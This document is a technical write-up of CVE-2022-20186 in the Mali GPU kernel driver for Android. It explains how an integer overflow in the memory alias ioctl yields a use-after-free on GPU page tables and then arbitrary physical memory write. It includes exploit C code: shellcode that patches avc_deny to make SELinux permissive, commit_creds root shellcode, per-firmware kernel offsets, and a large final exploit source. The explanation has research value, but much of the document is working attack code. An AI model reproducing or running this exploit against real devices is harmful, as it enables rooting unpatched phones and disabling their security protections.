CVE-2022-20186 Mali GPU Exploitation


Mali GPU architectures are named after Norse mythology: Utgard, Midgard, Bifrost, and most recently Valhall. Most modern Android phones use the Bifrost or Valhall architecture, and their kernel drivers share a large amount of code. Because these newer architectures are still largely based on Midgard, macros prefixed with "MIDGARD" (for example MIDGARD_MMU_LEVEL) sometimes appear in the Bifrost and Valhall drivers.

Memory management in the Mali kernel driver

There are several ways to share memory between the GPU and a user-space process; here we only discuss the case where the driver manages the shared memory. In this case, the user first calls the KBASE_IOCTL_MEM_ALLOC ioctl to allocate pages in the kbase_context. These pages come from the per-context memory pool mem_pools in the kbase_context and are not immediately mapped into the GPU or user space. The ioctl returns a cookie to the user, which is then used as the offset when mmap'ing the device file; this maps the pages into both the GPU and user space. When the memory is unmapped with munmap, the backing pages are recycled back into mem_pools.
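To make the flow concrete, here is a minimal sketch of that lifecycle. It assumes the Mali UAPI definitions (union kbase_ioctl_mem_alloc, KBASE_IOCTL_MEM_ALLOC, the BASE_MEM_* flags) from the mali.h header used by the exploit at the end of this post, and omits the version-check/set-flags handshake a real client must perform first (see setup_mali in the final exploit):

#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include "mali.h"   /* union kbase_ioctl_mem_alloc, KBASE_IOCTL_MEM_ALLOC */

void alloc_map_unmap(void) {
  int fd = open("/dev/mali0", O_RDWR);
  union kbase_ioctl_mem_alloc alloc = {0};
  alloc.in.va_pages = 1;
  alloc.in.commit_pages = 1;  /* backing pages come from the context's mem_pools */
  alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_CPU_WR |
                   BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_GPU_WR;
  ioctl(fd, KBASE_IOCTL_MEM_ALLOC, &alloc);
  /* alloc.out.gpu_va holds the cookie; used as the mmap offset, it maps the
     pages into both the GPU and CPU address spaces */
  void *p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED,
                 fd, alloc.out.gpu_va);
  munmap(p, 0x1000);          /* backing pages are recycled into mem_pools */
}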

Kbase_context

A kbase_context defines an execution environment for a user-space application to interact with the GPU. Each device file used to interact with the GPU has its own kbase_context. Among other things, a kbase_context defines its own GPU address space and manages the memory shared between user space and the GPU.

struct kbase_va_region *kbase_mem_alloc(struct kbase_context *kctx,
		u64 va_pages, u64 commit_pages,
		u64 extension, u64 *flags, u64 *gpu_va)
{
	...
	struct kbase_va_region *reg;
	...
	reg = kbase_alloc_free_region(rbtree, PFN_DOWN(*gpu_va),
			va_pages, zone);
	...

This function creates a kbase_va_region object to store information about the memory region. It also calls kbase_alloc_phy_pages to allocate backing pages (the actual memory we requested) from the kbase_context's memory pool mem_pools.

When called from a 64-bit process, the newly created region is stored in the kbase_context's pending_regions array instead of being mapped immediately.

if (*flags & BASE_MEM_SAME_VA) {
	...
	kctx->pending_regions[cookie_nr] = reg;

	/* relocate to correct base */
	cookie = cookie_nr + PFN_DOWN(BASE_MEM_COOKIE_BASE);
	cookie <<= PAGE_SHIFT;

	*gpu_va = (u64) cookie;
}
...

The cookie value in the code above is returned to the user; it can then be used as the offset argument to mmap to map the allocated memory into user space.

Mapping pages to user space

It is important to understand how the virtual address is assigned when mmap is called to map such a region, so here is a brief look at the user-space mapping. When mmap is called, kbase_context_get_unmapped_area is used to find a free region for the mapping:

unsigned long kbase_context_get_unmapped_area(struct kbase_context *const kctx,
		const unsigned long addr, const unsigned long len,
		const unsigned long pgoff, const unsigned long flags)
{
	...
	ret = kbase_unmapped_area_topdown(&info, is_shader_code,
			is_same_4gb_page);
	...
	return ret;
}

This call does not allow mapping memory at a fixed virtual address with the MAP_FIXED flag. Instead, kbase_unmapped_area_topdown is used to find a free region large enough to hold the requested memory and return its address. As the name suggests, kbase_unmapped_area_topdown returns the highest available address.

The mapped address is then stored in the start_pfn field of the kbase_va_region. To some extent this means the relative addresses of consecutively mapped regions are predictable:

int fd = open("/dev/mali0", O_RDWR);
union kbase_ioctl_mem_alloc alloc;
union kbase_ioctl_mem_alloc alloc2;
...
ioctl(fd, KBASE_IOCTL_MEM_ALLOC, &alloc);
ioctl(fd, KBASE_IOCTL_MEM_ALLOC, &alloc2);
void* region1 = mmap(NULL, 0x1000, prot, MAP_SHARED, fd, alloc.out.gpu_va);
void* region2 = mmap(NULL, 0x1000, prot, MAP_SHARED, fd, alloc2.out.gpu_va);

Here the virtual address of region2 will be region1 - 0x1000.

Mapping pages to the GPU

Each kbase_context maintains its own GPU address space and manages its own GPU page tables. Specifically, each kbase_context keeps a four-level page table that translates GPU addresses to the backing physical pages. It has an mmut field whose pgd field stores the top-level page global directory (PGD). mmut->pgd is interpreted as a page holding an array of 512 int64_t entries (512 * 8 = 4096 bytes, one page); each entry points to the page frame storing the next-level PGD, until the bottom level is reached, where the page table entries (PTEs) point to the backing pages (together with the page permissions).

Since most addresses are never accessed, PGDs and PTEs are only created on demand:

static int mmu_get_next_pgd(struct kbase_device *kbdev,
		struct kbase_mmu_table *mmut,
		phys_addr_t *pgd, u64 vpfn, int level)
{
	...
	p = pfn_to_page(PFN_DOWN(*pgd));
	page = kmap(p);
	...
	target_pgd = kbdev->mmu_mode->pte_to_phy_addr(page[vpfn]); //<------- 1.

	if (!target_pgd) {
		target_pgd = kbase_mmu_alloc_pgd(kbdev, mmut); //<------- 2.
		...
		kbdev->mmu_mode->entry_set_pte(&page[vpfn], target_pgd); //<------- 3.

When an access needs a particular page global directory (PGD), the entry is looked up in the PGD one level above (1. in the code). Since all entries of a PGD are initialized to a magic value marking them invalid, if the entry has never been accessed before, 1. returns NULL, which causes memory to be allocated for target_pgd (2. in the code). The address of target_pgd is then written back as an entry in the previous-level PGD (3. in the code).
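To make the walk concrete, here is a minimal illustration (my own sketch, not driver code) of how a virtual page frame number picks an entry at each of the four levels, assuming the 4 KB granule and 512-entry tables described above:

#include <stdint.h>

/* Index into the 512-entry table at a given level, 0 being the top-level
   PGD and 3 the bottom level of PTEs. Each level consumes 9 bits of the
   virtual page frame number. */
static int level_index(uint64_t vpfn, int level) {
  return (int)((vpfn >> ((3 - level) * 9)) & 0x1FF);
}

/* mmu_get_next_pgd above effectively reads page[level_index(vpfn, level)]
   at each level and allocates a fresh PGD page whenever that entry is
   still marked invalid. */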

Note

The page frames backing target_pgd are allocated from the mem_pools of the global kbase_device kbdev, a memory pool shared by all contexts.

When mapping memory to the GPU, kbase_gpu_mmap calls kbase_mmu_insert_pages to add the backing pages to the GPU page tables.

int kbase_gpu_mmap(struct kbase_context *kctx, struct kbase_va_region *reg, u64 addr, size_t nr_pages, size_t align)
{
	...
	alloc = reg->gpu_alloc;
	...
	if (reg->gpu_alloc->type == KBASE_MEM_TYPE_ALIAS) {
		...
	} else {
		err = kbase_mmu_insert_pages(kctx->kbdev,
				&kctx->mmu,
				reg->start_pfn, //<------ virtual address
				kbase_get_gpu_phy_pages(reg), //<------ backing pages
				kbase_reg_current_backed_size(reg),
				reg->flags & gwt_mask,
				kctx->as_nr,
				group_id);
		...
	}
	...
}

This inserts the backing pages at the address given by reg->start_pfn, which is also the address of the memory region in user space.

Memory alias

KBASE_IOCTL_MEM_ALIAS allows multiple memory regions to share the same backing pages. It is implemented in kbase_mem_alias, which takes a stride parameter and an array of base_mem_aliasing_info that specifies the memory regions backing the alias region.

union kbase_ioctl_mem_alias alias = {0};
alias.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
alias.in.stride = 4;
alias.in.nents = 2;
struct base_mem_aliasing_info ai[2];
ai[0].handle.basep.handle = region1;
ai[1].handle.basep.handle = region2;
ai[0].length = 0x3;
ai[1].length = 0x3;
ai[0].offset = 0;
ai[1].offset = 0;
alias.in.aliasing_info = (uint64_t)(&(ai[0]));
ioctl(mali_fd, KBASE_IOCTL_MEM_ALIAS, &alias);

Above, an alias region backed by region1 and region2 (both already mapped to the GPU) is created by passing the addresses of these regions as base_mem_aliasing_info::handle::basep::handle.

The stride parameter is the gap (in pages) between the two aliased regions, and nents is the number of backing regions (note: regions, not backing pages). The resulting region has a size of stride * nents pages, as shown in the figure below:

[Figure: layout of the alias region with stride = 4 and nents = 2]

The orange area represents the whole alias region, which covers 2 * 4 = 8 pages. Only 6 of them are actually mapped, backed by the backing pages of region1 and region2 respectively. If the alias region starts at alias_start, then addresses between alias_start and alias_start + 0x3000 (three pages) alias region1, while region2 is aliased by addresses between alias_start + stride * 0x1000 and alias_start + (stride + 3) * 0x1000.
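A small standalone sketch (alias_start is an illustrative placeholder, not a real address) that prints which alias page maps to which backing page in this example:

#include <stdint.h>
#include <stdio.h>

int main(void) {
  uint64_t alias_start = 0x6f00000000; /* placeholder for the mmap'ed alias address */
  uint64_t stride = 4, nents = 2, length = 3;
  for (uint64_t i = 0; i < nents; i++)
    for (uint64_t j = 0; j < length; j++)
      printf("alias page %#lx -> region%lu page %lu\n",
             alias_start + (i * stride + j) * 0x1000, i + 1, j);
  /* alias pages i * stride + length .. (i + 1) * stride - 1 (indices 3 and 7
     here) are left unmapped: the gaps in the figure. */
  return 0;
}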

This leaves some unmapped gaps in the alias region, which can be seen from how kbase_gpu_mmap handles memory regions of type KBASE_MEM_TYPE_ALIAS:

if (reg->gpu_alloc->type == KBASE_MEM_TYPE_ALIAS) {
	u64 const stride = alloc->imported.alias.stride;

	KBASE_DEBUG_ASSERT(alloc->imported.alias.aliased);
	for (i = 0; i < alloc->imported.alias.nents; i++) {
		if (alloc->imported.alias.aliased[i].alloc) {
			err = kbase_mmu_insert_pages(kctx->kbdev,
					&kctx->mmu,
					reg->start_pfn + (i * stride), //<------ each region maps at reg->start_pfn + (i * stride)
					alloc->imported.alias.aliased[i].alloc->pages + alloc->imported.alias.aliased[i].offset,
					alloc->imported.alias.aliased[i].length,
					reg->flags & gwt_mask,
					kctx->as_nr,
					group_id);
			...
		}
		...
	}

As the code shows, reg->start_pfn + (i * stride) is where each backing region starts being mapped inside the alias region.

Vulnerability

From the discussion so far, we know the size of the alias region is stride * nents. The relevant code is:

u64 kbase_mem_alias(struct kbase_context *kctx, u64 *flags, u64 stride,
		u64 nents, struct base_mem_aliasing_info *ai,
		u64 *num_pages)
{
	...
	if ((nents * stride) > (U64_MAX / PAGE_SIZE))
		/* 64-bit address range is the max */
		goto bad_size;

	/* calculate the number of pages this alias will cover */
	*num_pages = nents * stride; //<---- size of region

Although the (nents * stride) > (U64_MAX / PAGE_SIZE) check exists, the multiplication itself is never checked for overflow, so nents * stride can wrap around and yield a tiny num_pages for a huge stride.
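A standalone sketch of the wraparound arithmetic (not exploit code): with stride = 2**63 + 1 and nents = 2, the 64-bit product wraps to 2, so the size check passes:

#include <stdint.h>
#include <stdio.h>

#define PAGE_SIZE 4096

int main(void) {
  uint64_t stride = (1ULL << 63) + 1;   /* attacker-controlled */
  uint64_t nents = 2;
  uint64_t num_pages = nents * stride;  /* 2^64 + 2 wraps to 2 */
  printf("num_pages = %lu\n", num_pages);                                /* 2 */
  printf("check passes: %d\n", !((nents * stride) > (UINT64_MAX / PAGE_SIZE))); /* 1 */
  return 0;
}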

Now consider the following scenario. First, allocate three regions of size 0x1000 * 3 (region1, region2 and region3), map them to the GPU, and denote their start addresses as region1_start, region2_start and region3_start.

Then create an alias region with a stride of 2**63 + 1 and nents of 2, and map it. Because of the integer overflow, the size of the alias region becomes 2 pages; in particular, the alias region starts at alias_start = region3_start - 0x2000, where 0x2000 is the size of the alias region. Yet when the alias region is mapped to the GPU, kbase_gpu_mmap inserts three pages at alias_start:

if (reg->gpu_alloc->type == KBASE_MEM_TYPE_ALIAS) {
	u64 const stride = alloc->imported.alias.stride;

	KBASE_DEBUG_ASSERT(alloc->imported.alias.aliased);
	for (i = 0; i < alloc->imported.alias.nents; i++) {
		if (alloc->imported.alias.aliased[i].alloc) {
			err = kbase_mmu_insert_pages(kctx->kbdev,
					&kctx->mmu,
					reg->start_pfn + (i * stride), //<------- insert pages at reg->start_pfn, which is alias_start
					alloc->imported.alias.aliased[i].alloc->pages + alloc->imported.alias.aliased[i].offset,
					alloc->imported.alias.aliased[i].length, //<------- length is the length of the alias region, which is 3
					reg->flags & gwt_mask,
					kctx->as_nr,
					group_id);
			...
		}
		...
	}

Since region1's backing pages cover 0x3000 bytes while region3_start lies at alias_start + 0x2000, one page of region1's backing store ends up mapped into region3's range:

[Figure: overlap between the remapped alias region and region3 after the integer overflow]

The red rectangle on the right of the figure marks a page that, after the remapping, is reachable both via region1_start + 0x2000 and via region3_start. Since this red backing page is also owned by the alias region, unmapping both region1 and the alias region frees the page and returns it to the memory pool.

If both regions are unmapped at this point (releasing the page back into the memory pool), the GPU can still reach the freed page through the address at region3_start, giving us a clean use-after-free.

The rest follows the approach used in GHSL-2023-005: with some heap shaping, the backing page is freed into next_pool, from which PGD allocations also take their pages. Controlling the UAF'd page therefore gives us read/write access to a PGD, which yields the powerful primitive of arbitrary physical memory read/write.

Exploit walkthrough

write_adrp

uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
  uint64_t pc_page = pc >> 12;
  uint64_t label_page = label >> 12;
  int64_t offset = (label_page - pc_page) << 12;
  int64_t immhi_mask = 0xffffe0;
  int64_t immhi = offset >> 14;
  int32_t immlo = (offset >> 12) & 0x3;
  uint32_t adpr = rd & 0x1f;
  adpr |= (1 << 28);
  adpr |= (1 << 31); //op
  adpr |= immlo << 29;
  adpr |= (immhi_mask & (immhi << 5));
  return adpr;
}

void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {
  uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
  //Sets x0 to init_cred
  root_code[ADRP_INIT_INDEX] = init_adpr;
  root_code[ADD_INIT_INDEX] = add_init;
  //Sets x8 to commit_creds
  root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
  root_code[ADD_COMMIT_INDEX] = add_commit;
  root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
  root_code[5] = 0xd63f0100; // blr x8
  root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
  root_code[7] = 0xd65f03c0; // ret
}

First, a brief note on the adrp instruction. ADRP is an AArch64 instruction that computes the address of the 4 KB page containing a PC-relative target (the low 12 bits of the result are zero) and writes that address into a register. Its encoding is laid out as follows:

[Figure: ADRP instruction encoding]

uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
//Sets x0 to init_cred
root_code[ADRP_INIT_INDEX] = init_adpr;
root_code[ADD_INIT_INDEX] = add_init;

Note that ARMv8 uses a fixed-length instruction set (32-bit here). write_adrp generates an adrp instruction; the remaining two instructions are explained as follows.

How the ADRP + ADD pair works:

  • ADRP loads the page-aligned high part of the target address into a register. It only resolves down to the 4 KB page base, so the low 12 bits are always zero.

  • ADD then patches the base address produced by ADRP, adding the low 12 bits of the target (the in-page offset) to the register.

ADRP can only produce 4 KB page-aligned addresses, while the actual target may sit at an offset inside a page. For example (verified in the sketch below):

  • Suppose the label address is 0x12345678.

  • ADRP can only load 0x12345000 (the page-aligned high part).

  • ADD then adds the offset 0x678 to the ADRP result.
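The split can be checked with a few lines of standalone C (just the arithmetic, not part of the exploit):

#include <assert.h>
#include <stdint.h>
#include <stdio.h>

int main(void) {
  uint64_t label = 0x12345678;
  uint64_t page = label & ~0xfffULL;  /* what ADRP materializes: 0x12345000 */
  uint64_t lo12 = label & 0xfffULL;   /* what the following ADD adds: 0x678 */
  assert(page + lo12 == label);
  printf("page = %#lx, lo12 = %#lx\n", page, lo12);
  return 0;
}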

map_gpu

void* map_gpu(int mali_fd, unsigned int pages, bool read_only, int group) {
  union kbase_ioctl_mem_alloc alloc = {0};
  alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22);
  int prot = PROT_READ;
  if (!read_only) {
    alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
    prot |= PROT_WRITE;
  }
  alloc.in.va_pages = pages;
  alloc.in.commit_pages = pages;
  mem_alloc(mali_fd, &alloc);
  void* region = mmap(NULL, 0x1000 * pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
  if (region == MAP_FAILED) {
    err(1, "mmap failed");
  }
  return region;
}

void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) {
  void* jc_region = map_gpu(mali_fd, 1, false, 0); // --> 1
  //....
}

void* drain_mem_pool(int mali_fd) {
  return map_gpu(mali_fd, POOL_SIZE, false, 1); // --> 2
}

int run_exploit() {
  int mali_fd = open_dev(MALI);

  //Regions for triggering the bug
  for (int i = 0; i < 2; i++) {
    void* region = map_gpu(mali_fd, 3, false, 1); // --> 3
    gpu_va[i] = (uint64_t)region;
  }
}

The group argument to map_gpu selects the memory group the allocation belongs to (encoded starting at bit 22 of the allocation flags). In this exploit, write_to allocates its job chain with group 0 (1 above), while the allocations that drain the pool and trigger the bug use group 1 (2 and 3 above), keeping the two sets of memory isolated from each other.

write_func

uint64_t set_addr_lv3(uint64_t addr) {
  uint64_t pfn = addr >> PAGE_SHIFT;
  pfn &= ~0x1FFUL;
  pfn |= 0x100UL;
  return pfn << PAGE_SHIFT;
}

static inline uint64_t compute_pt_index(uint64_t addr, int level) {
  uint64_t vpfn = addr >> PAGE_SHIFT;
  vpfn >>= (3 - level) * 9;
  return vpfn & 0x1FF;
}

void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
  uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
  uint64_t curr_overwrite_addr = 0;
  for (int i = 0; i < size; i++) {
    uint64_t base = reserved[i];
    uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000;
    uint64_t start_idx = compute_pt_index(base, 3);
    uint64_t end_idx = compute_pt_index(end, 3);
    printf("===========value i = %d ===============\n", i);
    for (uint64_t addr = base; addr < end; addr += 0x1000) {
      uint64_t overwrite_addr = set_addr_lv3(addr);
      if (curr_overwrite_addr != overwrite_addr) {
        printf("base == %lx\n", base);
        printf("end == %lx\n", end);
        printf("overwrite_addr == %lx\n", overwrite_addr);
        printf("curr_overwrite_addr == %lx\n", curr_overwrite_addr);
        printf("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
        curr_overwrite_addr = overwrite_addr;
        for (int code = code_size - 1; code >= 0; code--) {
          write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
        }
        usleep(300000);
      }
    }
  }
}

int main(){
  //...
  uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
  //Writing to gpu_va[1] will now overwrite the level 3 pgd in one of the reserved pages mapped earlier.
  for (int i = 0; i < 2; i++) {
    write_to(mali_fd, gpu_va[1] + i * 0x1000 + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
  }
  usleep(100000);
  //Go through the reserve pages addresses to write to sel_read_enforce with our own shellcode
  write_func(mali_fd, avc_deny, &(reserved[0]), TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));
  debug();
  //...
}

The write_to calls in the for loop above overwrite page table entries. Note that OVERWRITE_INDEX is 0x100 = 256. At this point gpu_va[1] + i * 0x1000 can be thought of as pointing at a level 3 PGD (the page holding the PTEs), and we overwrite its 256th entry (at offset 0x100 * 8 = 0x800) with the page frame of the physical address of the avc_deny function. This is computed as (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443, where 0x443 fills in the attribute bits in the low 12 bits of the entry (see the ARMv8 documentation for details), making the entry valid and the page readable and writable.
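Factoring that expression out (a sketch built from the exploit's own constants; KERNEL_BASE here is the kernel's physical load address on the target device, so a symbol offset plus KERNEL_BASE yields a physical address, and the 0x443 attribute bits follow the ARMv8-style descriptor format the text cites):

#include <stdint.h>

#define KERNEL_BASE 0x80000000
#define PAGE_SHIFT  12

/* Build the rogue level 3 entry for a kernel symbol offset such as avc_deny:
   page-aligned physical address | 0x443, attribute bits that mark the entry
   valid and allow read/write access to the page. */
static uint64_t rogue_pte(uint64_t ksym_offset) {
  uint64_t pa = ksym_offset + KERNEL_BASE;
  return ((pa >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
}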

After the page table entry has been overwritten, some page inside reserved[i] now maps the page containing avc_deny. A brute-force approach would be to walk every reserved[i] + j * 0x1000 and patch the code at avc_deny's page offset, but that is unnecessary. ARMv8 here uses three levels of translation, giving 3 * 9 + 12 = 39 effective address bits, and the level 3 index is addr[20:12]. Since OVERWRITE_INDEX was set to 256, any virtual address whose level 3 index is 0x100 lands on the corrupted (evil) page table entry. This is exactly why set_addr_lv3 contains pfn &= ~0x1FFUL; pfn |= 0x100UL;: among the addresses reserved[i] + j * 0x1000 we only need to visit one per distinct combination of level 1 and level 2 indices.
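A quick standalone self-check of this trick, reusing the exploit's set_addr_lv3 and compute_pt_index:

#include <assert.h>
#include <stdint.h>

#define PAGE_SHIFT 12

static uint64_t set_addr_lv3(uint64_t addr) {
  uint64_t pfn = addr >> PAGE_SHIFT;
  pfn &= ~0x1FFUL;   /* clear addr[20:12], the level 3 index */
  pfn |= 0x100UL;    /* force it to OVERWRITE_INDEX (0x100) */
  return pfn << PAGE_SHIFT;
}

static inline uint64_t compute_pt_index(uint64_t addr, int level) {
  uint64_t vpfn = addr >> PAGE_SHIFT;
  vpfn >>= (3 - level) * 9;
  return vpfn & 0x1FF;
}

int main(void) {
  uint64_t addr = 0x7f12345000UL;  /* an arbitrary example VA */
  uint64_t fixed = set_addr_lv3(addr);
  assert(compute_pt_index(fixed, 3) == 0x100);                     /* level 3 index forced */
  assert(compute_pt_index(fixed, 2) == compute_pt_index(addr, 2)); /* levels 1-2 untouched */
  assert(compute_pt_index(fixed, 1) == compute_pt_index(addr, 1));
  return 0;
}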

As a verification, setting OVERWRITE_INDEX to 255 (0xff) and correspondingly using pfn |= 0xffUL in set_addr_lv3 also hits the overwritten page table entry:

[Figure: verification run with OVERWRITE_INDEX = 0xff hitting the corrupted entry]

The end result:

[Figure: SELinux set to permissive and a root shell obtained]

Final exp

#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <ctype.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/system_properties.h>

#include "stdbool.h"

#include "mali.h"
#include "mali_base_jm_kernel.h"
#include "midgard.h"

#define MALI "/dev/mali0"

#define PAGE_SHIFT 12

#define BASE_MEM_ALIAS_MAX_ENTS ((size_t)24576)

#define PFN_DOWN(x) ((x) >> PAGE_SHIFT)

#define POOL_SIZE 16384

#define RESERVED_SIZE 32

#define TOTAL_RESERVED_SIZE 1024

#define KERNEL_BASE 0x80000000

#define OVERWRITE_INDEX 256

#define ADRP_INIT_INDEX 0

#define ADD_INIT_INDEX 1

#define ADRP_COMMIT_INDEX 2

#define ADD_COMMIT_INDEX 3

#define AVC_DENY_2108 0x92df1c

#define SEL_READ_ENFORCE_2108 0x942ae4

#define INIT_CRED_2108 0x29a0570

#define COMMIT_CREDS_2108 0x180b0c

#define ADD_INIT_2108 0x9115c000

#define ADD_COMMIT_2108 0x912c3108

#define AVC_DENY_2201 0x930af4

#define SEL_READ_ENFORCE_2201 0x9456bc

#define INIT_CRED_2201 0x29b0570

#define COMMIT_CREDS_2201 0x183df0

#define ADD_INIT_2201 0x9115c000

#define ADD_COMMIT_2201 0x9137c108

#define AVC_DENY_2202 0x930b50

#define SEL_READ_ENFORCE_2202 0x94551c

#define INIT_CRED_2202 0x29b0570

#define COMMIT_CREDS_2202 0x183e3c

#define ADD_INIT_2202 0x9115c000 //add x0, x0, #0x570

#define ADD_COMMIT_2202 0x9138f108 //add x8, x8, #0xe3c
#define debug()(printf("Press enter to continue.\n"), (void)getchar())

static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2108;

static uint64_t avc_deny = AVC_DENY_2108;

static int atom_number = 1;

/*
Overwriting SELinux to permissive
strb wzr, [x0]
mov x0, #0
ret
*/
static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};

static uint32_t root_code[8] = {0};

struct base_mem_handle {
  struct {
    __u64 handle;
  } basep;
};

struct base_mem_aliasing_info {
  struct base_mem_handle handle;
  __u64 offset;
  __u64 length;
};

void print_binary(void *addr, int len)
{
  size_t *buf64 = (size_t *) addr;
  char *buf8 = (char *) addr;
  for (int i = 0; i < len / 8; i += 2) {
    printf(" %04x", i * 8);
    for (int j = 0; j < 2; j++) {
      i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
    }
    printf(" ");
    for (int j = 0; j < 16 && j + i * 8 < len; j++) {
      printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
    }
    puts("");
  }
}

static int open_dev(char* name) {
  int fd = open(name, O_RDWR);
  if (fd == -1) {
    err(1, "cannot open %s\n", name);
  }
  return fd;
}

void setup_mali(int fd) {
  struct kbase_ioctl_version_check param = {0};
  if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, &param) < 0) {
    err(1, "version check failed\n");
  }
  struct kbase_ioctl_set_flags set_flags = {1 << 3};
  if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) {
    err(1, "set flags failed\n");
  }
}

void* setup_tracking_page(int fd) {
  void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE);
  if (region == MAP_FAILED) {
    err(1, "setup tracking page failed");
  }
  return region;
}

void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) {
  if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) {
    err(1, "mem_alloc failed\n");
  }
}

void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) {
  if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) {
    err(1, "mem_alias failed\n");
  }
}

void mem_query(int fd, union kbase_ioctl_mem_query* query) {
  if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) {
    err(1, "mem_query failed\n");
  }
}

uint32_t lo32(uint64_t x) {
  return x & 0xffffffff;
}

uint32_t hi32(uint64_t x) {
  return x >> 32;
}

uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
  uint64_t pc_page = pc >> 12;
  uint64_t label_page = label >> 12;
  int64_t offset = (label_page - pc_page) << 12;
  int64_t immhi_mask = 0xffffe0;
  int64_t immhi = offset >> 14;
  int32_t immlo = (offset >> 12) & 0x3;
  uint32_t adpr = rd & 0x1f;
  adpr |= (1 << 28);
  adpr |= (1 << 31); //op
  adpr |= immlo << 29;
  adpr |= (immhi_mask & (immhi << 5));
  return adpr;
}

void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {
  uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
  //Sets x0 to init_cred
  root_code[ADRP_INIT_INDEX] = init_adpr;
  root_code[ADD_INIT_INDEX] = add_init;
  //Sets x8 to commit_creds
  root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
  root_code[ADD_COMMIT_INDEX] = add_commit;
  root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
  root_code[5] = 0xd63f0100; // blr x8
  root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
  root_code[7] = 0xd65f03c0; // ret
}

void* map_gpu(int mali_fd, unsigned int pages, bool read_only, int group) {
  union kbase_ioctl_mem_alloc alloc = {0};
  alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22);
  int prot = PROT_READ;
  if (!read_only) {
    alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
    prot |= PROT_WRITE;
  }
  alloc.in.va_pages = pages;
  alloc.in.commit_pages = pages;
  mem_alloc(mali_fd, &alloc);
  void* region = mmap(NULL, 0x1000 * pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
  if (region == MAP_FAILED) {
    err(1, "mmap failed");
  }
  return region;
}

void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) {
  void* jc_region = map_gpu(mali_fd, 1, false, 0);
  struct MALI_JOB_HEADER jh = {0};
  jh.is_64b = true;
  jh.type = MALI_JOB_TYPE_WRITE_VALUE;

  struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
  payload.type = type;
  payload.immediate_value = value;
  payload.address = gpu_addr;

  MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh);
  MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload);

  uint32_t* section = (uint32_t*)jc_region;
  struct base_jd_atom_v2 atom = {0};
  atom.jc = (uint64_t)jc_region;
  atom.atom_number = atom_number;
  atom.core_req = BASE_JD_REQ_CS;
  struct kbase_ioctl_job_submit submit = {0};
  submit.addr = (uint64_t)(&atom);
  submit.nr_atoms = 1;
  submit.stride = sizeof(struct base_jd_atom_v2);
  if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
    err(1, "submit job failed\n");
  }
  usleep(10000);
}

void* drain_mem_pool(int mali_fd) {
  return map_gpu(mali_fd, POOL_SIZE, false, 1);
}

